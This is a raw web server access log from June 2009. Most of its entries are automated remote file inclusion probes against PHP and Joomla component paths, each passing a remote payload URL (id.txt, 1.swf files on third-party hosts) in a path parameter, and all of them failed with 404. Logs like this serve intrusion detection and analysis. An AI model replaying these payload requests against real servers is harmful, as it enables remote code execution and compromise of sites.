211.43.212.9 - - [22/Jun/2009:07:01:03 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:04 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:06 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:07:01:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.43.212.9 - - [22/Jun/2009:07:01:09 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:09 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:11 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:11 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:01:15 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:01:15 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:01:15 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:01:16 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:01:16 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:01:16 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:20 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:20 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:21 -0400] "GET /logs/access_log.Q109052800//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:21 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:21 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:01:21 -0400] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:01:21 -0400] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:01:21 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:22 -0400] "GET /logs/access_log.Q109052800//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:25 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:25 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.225.217.11 - - [22/Jun/2009:07:01:26 -0400] "GET /logs/access_log.Q109052800//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:34 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:01:34 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:42 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:01:44 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:01:44 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:01:44 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:01:44 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:01:45 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.43.212.9 - - [22/Jun/2009:07:01:46 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:01:51 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:01:52 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:01 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:01 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:02 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:02 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:03 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:03 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:02:04 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:04 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:04 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:06 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:06 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:06 -0400] "GET //pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.94.80.27 - - [22/Jun/2009:07:02:06 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://ipsalamyo.trakya.edu.tr/moodledata/user/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:02:29 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:02:29 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:02:29 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:02:29 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:02:29 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:02:29 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
24.39.162.98 - - [22/Jun/2009:07:02:38 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
24.39.162.98 - - [22/Jun/2009:07:02:38 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
24.39.162.98 - - [22/Jun/2009:07:02:56 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
24.39.162.98 - - [22/Jun/2009:07:02:56 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
24.39.162.98 - - [22/Jun/2009:07:02:57 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
69.64.89.139 - - [22/Jun/2009:07:03:31 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:03:51 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:03:52 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:11 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:11 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:11 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:15 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
193.231.42.152 - - [22/Jun/2009:07:04:34 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.231.42.152 - - [22/Jun/2009:07:04:34 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 232 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
213.189.2.38 - - [22/Jun/2009:07:04:35 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
213.189.2.38 - - [22/Jun/2009:07:04:35 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:42 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:42 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:44 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:04:48 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.66.69.181 - - [22/Jun/2009:07:04:18 -0400] "GET /logs/access_log.Q109052800 HTTP/1.0" 200 4403369 "-" "Gaisbot/3.0+(robot06@gais.cs.ccu.edu.tw;+http://gais.cs.ccu.edu.tw/robot.php)"
201.232.54.48 - - [22/Jun/2009:07:05:01 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:05:03 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:05:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:05:14 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:05:14 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:05:14 -0400] "GET //include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:05:16 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
24.39.162.98 - - [22/Jun/2009:07:05:20 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.64.89.139 - - [22/Jun/2009:07:05:28 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:07:05:41 -0400] "GET /logs/access_log.Q109051200/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:07:05:46 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:05:47 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
172.16.1.73 - - [22/Jun/2009:07:05:48 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [22/Jun/2009:07:05:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.73 - - [22/Jun/2009:07:05:48 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
58.227.193.198 - - [22/Jun/2009:07:05:53 -0400] "GET /logs/error_log.Q109051200/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:05:55 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.115.58.73 - - [22/Jun/2009:07:06:08 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:07:06:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.115.58.73 - - [22/Jun/2009:07:06:15 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:06:21 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:06:29 -0400] "GET /logs/access_log.Q109060400%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:07:06:30 -0400] "GET /errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:07:06:30 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:07:06:30 -0400] "GET /logs/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:07:06:41 -0400] "GET /logs/access_log.Q109050700///?_PHPLIB[libdir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
172.16.1.180 - - [22/Jun/2009:07:06:45 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:07:06:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:07:06:45 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
201.232.54.48 - - [22/Jun/2009:07:06:49 -0400] "GET /logs/access_log.Q109060400%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:07:06:51 -0400] "GET /logs/access_log.Q109051100%20%20//include/mail.inc.php?skin_board_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.15.171.4 - - [22/Jun/2009:07:06:54 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.51.133.202 - - [22/Jun/2009:07:07:13 -0400] "GET /logs/error_log.Q109060400%20%20/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.231.42.152 - - [22/Jun/2009:07:07:15 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
67.15.171.4 - - [22/Jun/2009:07:07:15 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
24.39.162.98 - - [22/Jun/2009:07:07:24 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
67.15.171.4 - - [22/Jun/2009:07:07:41 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lc.ndhu.edu.tw/phpMyAdmin/README? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
193.231.42.152 - - [22/Jun/2009:07:07:48 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
193.231.42.152 - - [22/Jun/2009:07:07:48 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
193.231.42.152 - - [22/Jun/2009:07:07:49 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://MiNgOnIsHoW.altervista.org/A51/id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
172.16.1.180 - - [22/Jun/2009:07:08:23 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:07:08:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [22/Jun/2009:07:08:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
195.207.160.102 - - [22/Jun/2009:07:08:25 -0400] "GET /logs/access_log.Q109051200/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
201.232.54.48 - - [22/Jun/2009:07:08:37 -0400] "GET /logs/access_log.Q109061500/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
